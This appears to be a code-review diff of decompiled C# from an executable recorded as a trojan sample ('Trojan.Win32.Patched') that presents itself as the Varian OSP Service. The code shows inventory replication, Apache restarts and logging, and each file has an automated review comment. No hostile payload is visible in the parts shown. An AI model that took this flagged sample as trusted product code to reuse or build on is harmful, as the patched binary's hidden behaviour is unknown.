Delegate.Combine((Delegate[]) aList.ToArray()).DynamicInvoke();
}
catch (Exception ex)
{
ady.a(Level.Exception, "In TimerLoop:", ex);
}
}
}
catch (Exception ex)
{
ady.a(Level.Exception, "Outer layer around TimerLoop:", ex);
}
}
[SpecialName]
internal static bool c()
{
lock (x.b)
return x.a;
}
private static void b()
{
try
{
try
{
bool? A_0 = gs.b();
o4.a(A_0);
fb.a(A_0);
}
catch (Exception ex)
{
ady.a(Level.Exception, "OnFiveMinutes", ex);
}
}
catch
{
}
}
private static void a()
{
try
{
try
{
fb.a();
l9.c();
}
catch (Exception ex)
{
ady.a(Level.Exception, "OnOneHour", ex);
}
}
catch
{
}
}
private delegate void a();
}
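Review bot: `Monitor.Wait(x.b)` in the stop handler (`ServiceBase.f`) has no timeout, and the only `Monitor.PulseAll(x.b)` is issued by the timer thread in `d()` when it observes `x.a == false`. If that thread is not running at that point (for example `x.f.Start()` threw after `x.a` was already set to `true`, or the loop left through the outer catch), the stop call blocks indefinitely. A bounded wait such as `Monitor.Wait(x.b, TimeSpan.FromSeconds(30.0))`, with a log entry when it returns `false`, would keep service shutdown responsive. The empty outer `catch` blocks in the start and stop handlers should carry a comment explaining why a logging failure is deliberately ignored.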
@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
@@ -0,0 +1,73 @@
// Decompiled with JetBrains decompiler
// Type: VMS.OSService.Abstract.AbstractService
// Assembly: VMS.OSP.Service, Version=1.4.2.0, Culture=neutral, PublicKeyToken=null
// MVID: 7B29B897-26BF-407B-B0D0-14253383A174
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-06a1c79ea1bf078d9f5816243d6887697530720ed581c2975d99154e2a24648f.exe
using System;
using System.Diagnostics;
using VMS.OSP.Services.Logging;
namespace VMS.OSService.Abstract
{
public abstract class AbstractService
{
private const string cApplicationId = "Varian OSP Service";
private SysLog _sysLog;
private EventLog _evtLog;
internal void Init(SysLog sysLog, EventLog evtLog)
{
this._sysLog = sysLog;
this._evtLog = evtLog;
}
protected SysLog SysLog => this._sysLog;
protected void WriteSysLog(OSP_SEVERITY eSeverity, string strCategory, string strMessage)
{
if (this.SysLog.ConnectionState.Equals(false))
{
this.SysLog.CloseLog();
this.SysLog.OpenLog();
}
try
{
this.SysLog.Write(eSeverity, (OSP_FACILITY) 3, "Varian OSP Service", strCategory, strMessage);
}
catch (Exception ex)
{
strMessage = "SysLog.Write failed: " + ex.Message + "\r\nOriginal SysLog Msg: " + strMessage;
this.WriteFallBackEntry(eSeverity, strCategory, strMessage);
}
}
private void WriteFallBackEntry(OSP_SEVERITY eSeverity, string strCategory, string strMessage)
{
if (eSeverity == 6)
return;
if (eSeverity == 7)
return;
try
{
strMessage = string.Format("Application: {0}/{1} Severity: {2}\r\n{3}", (object) "Varian OSP Service", (object) strCategory, (object) ((object) eSeverity).ToString(), (object) strMessage);
this._evtLog.WriteEntry(strMessage, EventLogEntryType.Error);
}
catch (Exception ex)
{
}
}
internal virtual void OnStart(string[] args)
{
}
internal virtual void OnStop()
{
}
internal virtual void OnCustomEvent(int command)
{
}
}
}
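Review bot: The reconnect in `WriteSysLog` (`CloseLog()` followed by `OpenLog()`) runs before the `try`, so an exception from either call escapes to the caller and the event-log fallback in `WriteFallBackEntry` is never reached for that failure. Moving the `if (this.SysLog.ConnectionState.Equals(false))` block inside the `try` would route reconnect failures through the same fallback as write failures. `WriteFallBackEntry` returns early for severities 6 and 7 and swallows its own exception; a comment such as `// low-severity entries are not mirrored to the event log; the fallback itself is best-effort` would document that (the meaning of 6 and 7 is inferred from how callers use them and should be confirmed against `OSP_SEVERITY`).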
@@ -0,0 +1,70 @@
// Decompiled with JetBrains decompiler
// Type: VMS.OSService.Abstract.BaseServicesSetup
// Assembly: VMS.OSP.Service, Version=1.4.2.0, Culture=neutral, PublicKeyToken=null
// MVID: 7B29B897-26BF-407B-B0D0-14253383A174
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-06a1c79ea1bf078d9f5816243d6887697530720ed581c2975d99154e2a24648f.exe
using System;
using System.Collections;
using System.Configuration;
using System.Diagnostics;
using VMS.OSP.Services.Logging;
namespace VMS.OSService.Abstract
{
public abstract class BaseServicesSetup
{
private ArrayList _concreteServices = new ArrayList();
private SysLog _sysLog;
private EventLog _evtLog;
public BaseServicesSetup(EventLog evtLog)
{
this._evtLog = evtLog;
this.OpenSysLog();
}
private void OpenSysLog()
{
this._sysLog = new SysLog();
this._sysLog.OpenLog();
}
protected bool ServiceComponentEnabled(string componentName)
{
bool flag = true;
try
{
flag = (bool) new AppSettingsReader().GetValue(componentName, typeof (bool));
}
catch (Exception ex)
{
}
return flag;
}
protected void AddService(AbstractService aNewService)
{
aNewService.Init(this._sysLog, this._evtLog);
this._concreteServices.Add((object) aNewService);
}
public void StartAll(string[] args)
{
foreach (AbstractService concreteService in this._concreteServices)
concreteService.OnStart(args);
}
public void StopAll()
{
foreach (AbstractService concreteService in this._concreteServices)
concreteService.OnStop();
}
public void CustomCommandToAll(int cmd)
{
foreach (AbstractService concreteService in this._concreteServices)
concreteService.OnCustomEvent(cmd);
}
}
}
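Review bot: `ServiceComponentEnabled` starts from `flag = true` and discards every exception, so a missing or malformed app-settings entry enables the component without leaving any trace. For components that act on the host this fail-open default should at least be recorded, e.g. in the catch `this._evtLog.WriteEntry("Setting '" + componentName + "' unreadable; component enabled by default", EventLogEntryType.Warning);`, and stated in a summary comment on the method. `StopAll` has a related gap: an exception from one `OnStop` ends the `foreach`, so the services after it in `_concreteServices` are never asked to stop.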
@@ -0,0 +1,12 @@
using System.Reflection;
[assembly: AssemblyDelaySign(false)]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyTitle("Varian OSP Service")]
[assembly: AssemblyKeyName("")]
[assembly: AssemblyCopyright("Copyright 2006 Varian Medical Systems")]
[assembly: AssemblyProduct("Varian OSP Service")]
[assembly: AssemblyCompany("Varian Medical Systems, Inc.")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyDescription("OSP Software Windows Service")]
[assembly: AssemblyVersion("1.4.2.0")]
@@ -0,0 +1,39 @@
// Decompiled with JetBrains decompiler
// Type: VMS.OSService.Concrete.ConcreteServicesSetup
// Assembly: VMS.OSP.Service, Version=1.4.2.0, Culture=neutral, PublicKeyToken=null
// MVID: 7B29B897-26BF-407B-B0D0-14253383A174
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-06a1c79ea1bf078d9f5816243d6887697530720ed581c2975d99154e2a24648f.exe
using System.Diagnostics;
using VMS.OSService.Abstract;
using VMS.OSService.Concrete.Inventory;
namespace VMS.OSService.Concrete
{
public class ConcreteServicesSetup : BaseServicesSetup
{
private string cCompInventory = "Inventory";
private string cCompInventoryUpdate = "InventoryUpdate";
private string cCompMaintenance = "Maintenance";
private string cCompPlatformServiceController = "PlatformServiceController";
public ConcreteServicesSetup(EventLog evtLog)
: base(evtLog)
{
this.SetupServices();
}
public void SetupServices()
{
if (this.ServiceComponentEnabled(this.cCompInventory))
this.AddService((AbstractService) new InventoryReplicator());
if (this.ServiceComponentEnabled(this.cCompInventoryUpdate))
this.AddService((AbstractService) new InventoryUpdate());
if (this.ServiceComponentEnabled(this.cCompMaintenance))
this.AddService((AbstractService) new VMS.OSService.Concrete.Maintenance.Maintenance());
if (!this.ServiceComponentEnabled(this.cCompPlatformServiceController))
return;
this.AddService((AbstractService) new VMS.OSService.Concrete.PlatformServiceController.PlatformServiceController());
}
}
}
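Review bot: `SetupServices` is public but already runs from the constructor, so any later call registers each enabled component a second time, because `AddService` in the base class only appends to its list. Unless an external caller depends on it, declaring it `private void SetupServices()` removes that possibility. The four component-name fields are never reassigned and could be `private const string`, which matches the `c` prefix they already carry.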
@@ -0,0 +1,142 @@
// Decompiled with JetBrains decompiler
// Type: VMS.OSService.Concrete.Inventory.InventoryReplicator
// Assembly: VMS.OSP.Service, Version=1.4.2.0, Culture=neutral, PublicKeyToken=null
// MVID: 7B29B897-26BF-407B-B0D0-14253383A174
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-06a1c79ea1bf078d9f5816243d6887697530720ed581c2975d99154e2a24648f.exe
using System;
using System.Net;
using System.Threading;
using VMS.OSP.Inventory;
using VMS.OSP.Inventory.Common;
using VMS.OSP.Services;
using VMS.OSP.Services.Configuration;
using VMS.OSP.Services.Logging;
using VMS.OSService.Abstract;
namespace VMS.OSService.Concrete.Inventory
{
public class InventoryReplicator : AbstractService
{
private const int cSlowReplicationInterval = 7200000;
private const int cPendingReplicationInterval = 3000;
private const int cStartReplicationDelay = 5000;
private const string cSysLogCategory = "InventoryComponent";
private System.Threading.Timer _timer;
private InventoryReplicator.TState _currState;
private DateTime _lastReplicationRequested = DateTime.MaxValue;
public InventoryReplicator() => this._timer = new System.Threading.Timer(new TimerCallback(this.OnTimer), (object) null, -1, -1);
private InventoryReplicator.TState CurrState
{
get => this._currState;
set => this._currState = value;
}
protected void OnTimer(object o)
{
lock (this)
{
switch (this.CurrState)
{
case InventoryReplicator.TState.cReplicationPeriodic:
this.ReplicateClientInventory();
this.RegisterWorkstation();
break;
case InventoryReplicator.TState.cReplicationAfterChanges:
if ((DateTime.Now - this._lastReplicationRequested).TotalMilliseconds < 5000.0)
break;
this._timer.Change(7200000, 7200000);
this.CurrState = InventoryReplicator.TState.cReplicationPeriodic;
this.ReplicateClientInventory();
break;
}
}
}
internal override void OnCustomEvent(int command)
{
switch (command)
{
case 160:
this.ReplicateRequested();
break;
case 161:
this.RegisterWorkstation();
break;
}
}
internal override void OnStart(string[] args)
{
this.WriteSysLog((OSP_SEVERITY) 6, "InventoryComponent", "Inventory Component started");
this._timer.Change(100, 7200000);
}
internal override void OnStop()
{
this.WriteSysLog((OSP_SEVERITY) 6, "InventoryComponent", "Inventory Component stopped");
this._timer.Change(-1, -1);
}
private string InventoryWebServiceUrl => string.Format("http://{0}/ospservices/inventory.asmx", (object) Env.GetServerNameAndPort());
private void ReplicateClientInventory()
{
WebRequest.DefaultWebProxy = (IWebProxy) null;
VMS.OSP.Inventory.Inventory inventory = new VMS.OSP.Inventory.Inventory();
inventory.Url = this.InventoryWebServiceUrl;
string inventoryFileLocation = InventoryConstants.ClientInventoryFileLocation;
string fileLocationVer3 = InventoryConstants.ClientInventoryFileLocationVer3;
try
{
VMSInventoryDoc vmsInventoryDoc = new VMSInventoryDoc();
if (System.IO.File.Exists(inventoryFileLocation))
{
vmsInventoryDoc.Open(inventoryFileLocation, true);
inventory.MergeLocalInventory(vmsInventoryDoc.InternalDataSet);
this.WriteSysLog((OSP_SEVERITY) 6, "InventoryComponent", "Successfully replicated client inventory version 2 to the server.");
}
vmsInventoryDoc.Open(fileLocationVer3, true);
inventory.MergeLocalInventory(vmsInventoryDoc.InternalDataSet);
this.WriteSysLog((OSP_SEVERITY) 6, "InventoryComponent", "Successfully replicated client inventory version 3 to the server.");
}
catch (Exception ex)
{
this.WriteSysLog((OSP_SEVERITY) 3, "InventoryComponent", "" + "Error occurd while replicating client inventory to the server.\r\n" + ex.Message + "\r\n" + "\r\n------- Details ----------\r\n" + "Type\t\t: " + ex.GetType().ToString() + "Source\t\t: " + ex.Source + "\r\n" + "XmlFile\t\t: " + inventoryFileLocation + "\r\n" + "WebService\t: " + this.InventoryWebServiceUrl);
}
}
public void ReplicateRequested()
{
this.CurrState = InventoryReplicator.TState.cReplicationAfterChanges;
this._lastReplicationRequested = DateTime.Now;
this._timer.Change(3000, 3000);
}
private void RegisterWorkstation()
{
try
{
string siteFileLocation = InventoryConstants.ClientRegisterSiteFileLocation;
if (!System.IO.File.Exists(siteFileLocation))
return;
VMSSiteAdminDoc vmsSiteAdminDoc = VMSSiteAdminDoc.Load(siteFileLocation);
if (!new OSPClientLibraryFactory().CreateOspClientServices("DEFAULT").SiteAdmin.RegisterWorkstationToSite(vmsSiteAdminDoc.SiteId))
return;
System.IO.File.Delete(siteFileLocation);
}
catch (Exception ex)
{
this.WriteSysLog((OSP_SEVERITY) 3, "InventoryComponent", "" + "Error occurd while registering workstation in site on the server.\r\n" + ex.Message + "\r\n" + "\r\n------- Details ----------\r\n" + "Type\t\t: " + ex.GetType().ToString() + "Source\t\t: " + ex.Source + "\r\n");
}
}
private enum TState
{
cReplicationPeriodic,
cReplicationAfterChanges,
}
}
}
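Review bot: `InventoryWebServiceUrl` hard-codes the `http://` scheme, so `ReplicateClientInventory` sends the client inventory data set to the server without transport encryption or server authentication. If the server side supports TLS the format string should be `"https://{0}/ospservices/inventory.asmx"`, or the scheme should come from configuration. The same method assigns `WebRequest.DefaultWebProxy = (IWebProxy) null;`, which changes the proxy for every request in the process rather than for this call; if `VMS.OSP.Inventory.Inventory` exposes a per-instance proxy property (not visible here), setting that would be narrower. `OnCustomEvent` also calls `RegisterWorkstation()` for command 161 without the `lock (this)` that `OnTimer` takes, so the two paths can race on the site file that the method deletes.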
@@ -0,0 +1,79 @@
// Decompiled with JetBrains decompiler
// Type: VMS.OSService.Concrete.Inventory.InventoryUpdate
// Assembly: VMS.OSP.Service, Version=1.4.2.0, Culture=neutral, PublicKeyToken=null
// MVID: 7B29B897-26BF-407B-B0D0-14253383A174
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-06a1c79ea1bf078d9f5816243d6887697530720ed581c2975d99154e2a24648f.exe
using System;
using System.Configuration;
using System.Threading;
using VMS.OSP.Inventory;
using VMS.OSP.Inventory.Common;
using VMS.OSP.Services.Logging;
using VMS.OSService.Abstract;
namespace VMS.OSService.Concrete.Inventory
{
public class InventoryUpdate : AbstractService
{
private const int cPendingUpdateInterval = 3000;
private const int cStartUpdateDelay = 5000;
private const string cSysLogCategory = "InventoryUpdateComponent";
private long cSlowUpdateInterval = 604800000;
private Timer _timer;
private DateTime _lastUpdateRequested = DateTime.MaxValue;
public InventoryUpdate() => this._timer = new Timer(new TimerCallback(this.OnTimer), (object) null, -1, -1);
protected void OnTimer(object o)
{
lock (this)
this.UpdateClientInventory();
}
internal override void OnCustomEvent(int command)
{
}
internal override void OnStart(string[] args)
{
this.WriteSysLog((OSP_SEVERITY) 6, "InventoryUpdateComponent", "Inventory Operating System and Hotfix Component started");
AppSettingsReader appSettingsReader = new AppSettingsReader();
try
{
this.cSlowUpdateInterval = (long) (int) appSettingsReader.GetValue("InventoryUpdateInterval", typeof (int));
}
catch
{
}
this._timer.Change(this.cSlowUpdateInterval, this.cSlowUpdateInterval);
}
internal override void OnStop()
{
this.WriteSysLog((OSP_SEVERITY) 6, "InventoryUpdateComponent", "Inventory Operating System and Hotfix Component stopped");
this._timer.Change(-1, -1);
}
private void UpdateClientInventory()
{
string fileLocationVer3 = InventoryConstants.ClientInventoryFileLocationVer3;
VMSInventory vmsInventory = new VMSInventory();
try
{
vmsInventory.UpdateInventory(true);
this.WriteSysLog((OSP_SEVERITY) 6, "InventoryUpdateComponent", "Successfully updated operating system and hotfix details to client inventory.");
}
catch (Exception ex)
{
this.WriteSysLog((OSP_SEVERITY) 3, "InventoryUpdateComponent", "" + "Error occurd while updating operating systems and hotfix details to client inventory.\r\n" + ex.Message + "\r\n" + "\r\n------- Details ----------\r\n" + "Type\t\t: " + ex.GetType().ToString() + "Source\t\t: " + ex.Source + "\r\n" + "XmlFile\t\t: " + fileLocationVer3 + "\r\n");
}
}
private enum TState
{
cUpdatePeriodic,
cUpdateAfterChanges,
}
}
}
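Review bot: The `InventoryUpdateInterval` setting read in `OnStart` is passed to `_timer.Change` without a range check. A value below -1 makes `Timer.Change` throw `ArgumentOutOfRangeException` outside the `try`, and a very small positive value makes `UpdateClientInventory` run back to back. A guard after the read, e.g. `if (this.cSlowUpdateInterval <= 0) this.cSlowUpdateInterval = 604800000;`, would keep the built-in default, and a comment stating the unit (milliseconds, as `Timer.Change` takes it) would help whoever edits the configuration. The bare `catch` should say that a missing setting is expected and leaves the default in place.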
@@ -0,0 +1,59 @@
// Decompiled with JetBrains decompiler
// Type: VMS.OSService.Concrete.Maintenance.Maintenance
// Assembly: VMS.OSP.Service, Version=1.4.2.0, Culture=neutral, PublicKeyToken=null
// MVID: 7B29B897-26BF-407B-B0D0-14253383A174
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-06a1c79ea1bf078d9f5816243d6887697530720ed581c2975d99154e2a24648f.exe
using System;
using VMS.OSP.Services.Logging;
using VMS.OSP.Services.Maintenance;
using VMS.OSService.Abstract;
namespace VMS.OSService.Concrete.Maintenance
{
public class Maintenance : AbstractService
{
private const string cSysLogCategory = "MaintenanceComponent";
internal override void OnCustomEvent(int command)
{
if (command != 150)
return;
try
{
this.WriteSysLog((OSP_SEVERITY) 6, "MaintenanceComponent", "Executing Maintenance");
MaintenanceSvc.Instance.ManuallyStartAll();
}
catch (Exception ex)
{
this.WriteSysLog((OSP_SEVERITY) 6, "MaintenanceComponent", "Maintenance comp error: \r\n" + ex.ToString());
}
}
internal override void OnStart(string[] args)
{
try
{
this.WriteSysLog((OSP_SEVERITY) 6, "MaintenanceComponent", "Starting Maintenance Component");
MaintenanceSvc.Instance.StartAsync();
}
catch (Exception ex)
{
this.WriteSysLog((OSP_SEVERITY) 3, "MaintenanceComponent", ex.Message);
}
}
internal override void OnStop()
{
try
{
this.WriteSysLog((OSP_SEVERITY) 6, "MaintenanceComponent", "Stopping Maintenance Component");
MaintenanceSvc.Instance.Stop();
}
catch (Exception ex)
{
this.WriteSysLog((OSP_SEVERITY) 3, "MaintenanceComponent", ex.Message);
}
}
}
}
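Review bot: The catch block in `OnCustomEvent` reports the failure with `(OSP_SEVERITY) 6`, the same severity used for the routine "Executing Maintenance" message, while `OnStart` and `OnStop` report their failures with 3. Besides the inconsistency, `AbstractService.WriteFallBackEntry` returns early for severity 6, so a maintenance failure would be dropped whenever the syslog write itself fails. I would change the line to `this.WriteSysLog((OSP_SEVERITY) 3, "MaintenanceComponent", "Maintenance comp error: \r\n" + ex.ToString());`.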
@@ -0,0 +1,156 @@
// Decompiled with JetBrains decompiler
// Type: VMS.OSService.Concrete.PlatformServiceController.PlatformServiceController
// Assembly: VMS.OSP.Service, Version=1.4.2.0, Culture=neutral, PublicKeyToken=null
// MVID: 7B29B897-26BF-407B-B0D0-14253383A174
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-06a1c79ea1bf078d9f5816243d6887697530720ed581c2975d99154e2a24648f.exe
using Microsoft.Win32;
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.ServiceProcess;
using System.Threading;
using VMS.OSP.Services.Logging;
using VMS.OSService.Abstract;
namespace VMS.OSService.Concrete.PlatformServiceController
{
public class PlatformServiceController : AbstractService
{
private const string cSysLogCategory = "PlatformServiceCtrl";
private const string cApacheServiceName = "Apache2";
private const double clTargetTimeHour = 2.0;
private const double clTargetTimeMinute = 30.0;
private const int ciExecutionPeriod = 24;
private Timer _timer;
private ServiceController _serviceController;
public PlatformServiceController()
{
this._serviceController = new ServiceController("Apache2");
this._timer = new Timer(new TimerCallback(this.OnTimer), (object) null, -1, -1);
}
internal override void OnCustomEvent(int command)
{
}
protected void OnTimer(object o)
{
if (!this.IsApacheInstalledWithPlatformServer().Equals(true))
return;
this.RestartApache();
}
internal override void OnStart(string[] args)
{
try
{
this.WriteSysLog((OSP_SEVERITY) 6, "PlatformServiceCtrl", "PlatformServiceController Component started");
if (!this.IsApacheInstalledWithPlatformServer().Equals(true))
return;
this.SetNextDueTime();
}
catch (Exception ex)
{
this.WriteSysLog((OSP_SEVERITY) 3, "PlatformServiceCtrl", ex.Message);
}
}
internal override void OnStop()
{
try
{
this._timer.Change(-1, -1);
this.WriteSysLog((OSP_SEVERITY) 6, "PlatformServiceCtrl", "PlatformServiceController Component stopped");
}
catch (Exception ex)
{
this.WriteSysLog((OSP_SEVERITY) 3, "PlatformServiceCtrl", ex.Message);
}
}
private void SetNextDueTime()
{
DateTime dateTime = DateTime.Today.AddHours(2.0);
dateTime = dateTime.AddMinutes(30.0);
TimeSpan dueTime = dateTime.Subtract(DateTime.Now);
if (dueTime.Ticks < 0L)
dueTime = dueTime.Add(new TimeSpan(24, 0, 0));
this._timer.Change(dueTime, new TimeSpan(0, 24, 0, 0, 0));
this.WriteSysLog((OSP_SEVERITY) 6, "PlatformServiceCtrl", string.Format("Time duration until first execution: {0}", (object) dueTime));
}
private void RestartApache()
{
try
{
ServiceControllerStatus status = this._serviceController.Status;
this.WriteSysLog((OSP_SEVERITY) 6, "PlatformServiceCtrl", string.Format("Status of {0}: {1}", (object) "Apache2", (object) this._serviceController.Status.ToString()));
if (!status.Equals((object) ServiceControllerStatus.Running))
return;
this.WriteSysLog((OSP_SEVERITY) 6, "PlatformServiceCtrl", string.Format("Stopping {0}.", (object) "Apache2"));
this._serviceController.Stop();
this._serviceController.WaitForStatus(ServiceControllerStatus.Stopped, new TimeSpan(0, 0, 20));
this.WriteSysLog((OSP_SEVERITY) 6, "PlatformServiceCtrl", string.Format("Status of {0}: {1}", (object) "Apache2", (object) this._serviceController.Status.ToString()));
this.KillAllProcessesSyncNamed("rotatelogs");
this.WriteSysLog((OSP_SEVERITY) 6, "PlatformServiceCtrl", string.Format("Starting {0}.", (object) "Apache2"));
this._serviceController.Start();
this._serviceController.WaitForStatus(ServiceControllerStatus.Running, new TimeSpan(0, 0, 20));
this.WriteSysLog((OSP_SEVERITY) 6, "PlatformServiceCtrl", string.Format("Status of {0}: {1}", (object) "Apache2", (object) this._serviceController.Status.ToString()));
}
catch (InvalidOperationException ex)
{
this.WriteSysLog((OSP_SEVERITY) 3, "PlatformServiceCtrl", string.Format("Restarting {0} failed. Reason: {1}", (object) "Apache2", (object) ex.Message));
}
catch (Win32Exception ex)
{
this.WriteSysLog((OSP_SEVERITY) 3, "PlatformServiceCtrl", string.Format("Restarting {0} failed. Reason: {1}", (object) "Apache2", (object) ex.Message));
}
catch (Exception ex)
{
this.WriteSysLog((OSP_SEVERITY) 3, "PlatformServiceCtrl", string.Format("Restarting {0} failed. Reason: {1}", (object) "Apache2", (object) ex.Message));
}
}
private void KillAllProcessesSyncNamed(string processName)
{
foreach (Process process in Process.GetProcessesByName(processName))
{
try
{
process.Kill();
process.WaitForExit();
}
catch
{
}
}
}
private bool IsApacheInstalledWithPlatformServer()
{
bool flag = false;
try
{
string name = "SOFTWARE\\Varian Medical Systems\\OS\\ProductLine\\Platform Server";
using (RegistryKey registryKey = Registry.LocalMachine.OpenSubKey(name))
{
if (registryKey != null)
{
flag = true;
this.WriteSysLog((OSP_SEVERITY) 6, "PlatformServiceCtrl", string.Format("Platform Server installation detected."));
}
else
flag = false;
}
}
catch (Exception ex)
{
flag = false;
this.WriteSysLog((OSP_SEVERITY) 3, "PlatformServiceCtrl", string.Format("Could not retrieve registry key. Reason: {0}", (object) ex.Message));
}
return flag;
}
}
}
@@ -0,0 +1,10 @@
// Decompiled with JetBrains decompiler
// Type: OSPVersion
// Assembly: VMS.OSP.Service, Version=1.4.2.0, Culture=neutral, PublicKeyToken=null
// MVID: 7B29B897-26BF-407B-B0D0-14253383A174
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-06a1c79ea1bf078d9f5816243d6887697530720ed581c2975d99154e2a24648f.exe
internal class OSPVersion
{
public const string cVerStr = "1.4.2.1";
}
@@ -0,0 +1,60 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-06a1c79ea1bf078d9f5816243d6887697530720ed581c2975d99154e2a24648f.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{3933AEB5-C476-4FA9-875F-0DE64DF43C30}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>VMS.OSP.Service</AssemblyName>
<ApplicationVersion>1.4.2.0</ApplicationVersion>
<RootNamespace>VMS.OSService</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Configuration" />
<Reference Include="System.Configuration.Install" />
<Reference Include="System.ServiceProcess" />
<Reference Include="System.Web.Services" />
</ItemGroup>
<ItemGroup>
<Compile Include="OSPVersion.cs" />
<Compile Include="VMSOSPService.cs" />
<Compile Include="VMSOSPServiceInstaller.cs" />
<Compile Include="VMSOSPStartup.cs" />
<Compile Include="Abstract\AbstractService.cs" />
<Compile Include="Abstract\BaseServicesSetup.cs" />
